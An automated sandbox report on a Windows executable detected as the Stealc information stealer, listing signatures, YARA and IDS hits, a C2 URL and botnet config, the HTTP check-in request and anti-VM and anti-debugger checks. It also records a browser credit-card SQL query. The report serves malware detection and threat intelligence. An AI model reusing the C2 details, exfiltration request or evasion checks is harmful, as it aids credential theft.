Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532741
MD5: 054dffcd797e0e40c9e7b3050814f148
SHA1: d5d545a246bb31a238e4a2632bdc878a35bd8d7e
SHA256: 6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 054DFFCD797E0E40C9E7B3050814F148)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 4392 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 4392 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.5c0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-13T21:04:08.967465+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.5c0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_005CC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_005C7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_005C9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_005C9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_005D8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005D4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005CE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005D4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005CED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005D3EA0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_005C4880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpuL
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37L

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00996969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009932C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A13A09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00908BEA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098AC3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BC434
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FDC30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098FC59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099847F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00994DBC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F8DF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C1EA6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096DE1D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098C74C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099177F
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005C45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yhphlozs ZLIB complexity 0.9949685097603256
Source: file.exe, 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005D9600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_005D3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EHI8I06B.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsr?;
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1854976 > 1048576
Source: file.exe | Static PE information: Raw size of yhphlozs is bigger than: 0x100000 < 0x19ea00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.5c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005D9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cdfff should be: 0x1d161e
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: yhphlozs
Source: file.exe | Static PE information: section name: rdjojuwm
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CC0CE push edx; mov dword ptr [esp], esp 0_2_009CC10B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A138F2 push 71AE9534h; mov dword ptr [esp], ecx 0_2_00A1391A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB035 push ecx; ret 0_2_005DB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A758CE push 680F0635h; mov dword ptr [esp], esp 0_2_00A758D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A758CE push 5B8C78D7h; mov dword ptr [esp], eax 0_2_00A75FD2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push edi; mov dword ptr [esp], ebx 0_2_0090F0B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push ebp; mov dword ptr [esp], 5FDFE3EEh 0_2_0090F174
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push 69B550A1h; mov dword ptr [esp], ebx 0_2_0090F1A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push 1350B330h; mov dword ptr [esp], edx 0_2_0090F26E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push 514680F2h; mov dword ptr [esp], eax 0_2_0090F2A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090F027 push 395FF5D2h; mov dword ptr [esp], edx 0_2_0090F2B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D4840 push ebx; mov dword ptr [esp], 123D5D00h 0_2_009D484C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BE07D push 4E27B35Bh; mov dword ptr [esp], eax 0_2_009BE092
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BE07D push ebp; mov dword ptr [esp], edx 0_2_009BE0E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A33852 push edi; mov dword ptr [esp], 02C24316h 0_2_00A33856
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A33852 push eax; mov dword ptr [esp], edx 0_2_00A33981
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C718F push ecx; mov dword ptr [esp], eax 0_2_008C723B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C718F push esi; mov dword ptr [esp], 64AEEE82h 0_2_008C727F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C718F push ecx; mov dword ptr [esp], edx 0_2_008C7310
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C718F push ebx; mov dword ptr [esp], ebp 0_2_008C7314
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2C98D push 6AC2D9FCh; mov dword ptr [esp], ebx 0_2_00A2C9B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2C98D push 5FD3D891h; mov dword ptr [esp], ecx 0_2_00A2C9BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A069EC push esi; mov dword ptr [esp], ecx 0_2_00A06A56
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push edx; mov dword ptr [esp], ecx 0_2_0098E1DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push esi; mov dword ptr [esp], ecx 0_2_0098E214
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], 4C97D83Ah 0_2_0098E23E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push ebx; mov dword ptr [esp], 17851D7Dh 0_2_0098E2CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push 1DCB9CECh; mov dword ptr [esp], esi 0_2_0098E316
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push ecx; mov dword ptr [esp], ebp 0_2_0098E391
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], edi 0_2_0098E3B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E1D5 push 172EDC16h; mov dword ptr [esp], ecx 0_2_0098E402
Source: file.exe | Static PE information: section name: yhphlozs entropy: 7.95378057749378

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005D9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13365
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99C546 second address: 99C55E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7F147AEA4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99C7FE second address: 99C804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99C804 second address: 99C809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99CAFB second address: 99CB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99CB01 second address: 99CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 99CB05 second address: 99CB3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7F1511CE2Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 jp 00007F7F1511CE26h 0x0000001f jmp 00007F7F1511CE36h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0713 second address: 9A0719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0719 second address: 9A071E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A071E second address: 9A0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 647CAD3Fh 0x0000000e sub cx, 0E59h 0x00000013 push 00000003h 0x00000015 mov ch, bl 0x00000017 push 00000000h 0x00000019 jmp 00007F7F147AEA4Eh 0x0000001e or dword ptr [ebp+122D35E9h], edi 0x00000024 push 00000003h 0x00000026 jmp 00007F7F147AEA4Dh 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D2B54h], edx 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D28EFh], ebx 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 722811A0h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0775 second address: 9A0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0779 second address: 9A077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
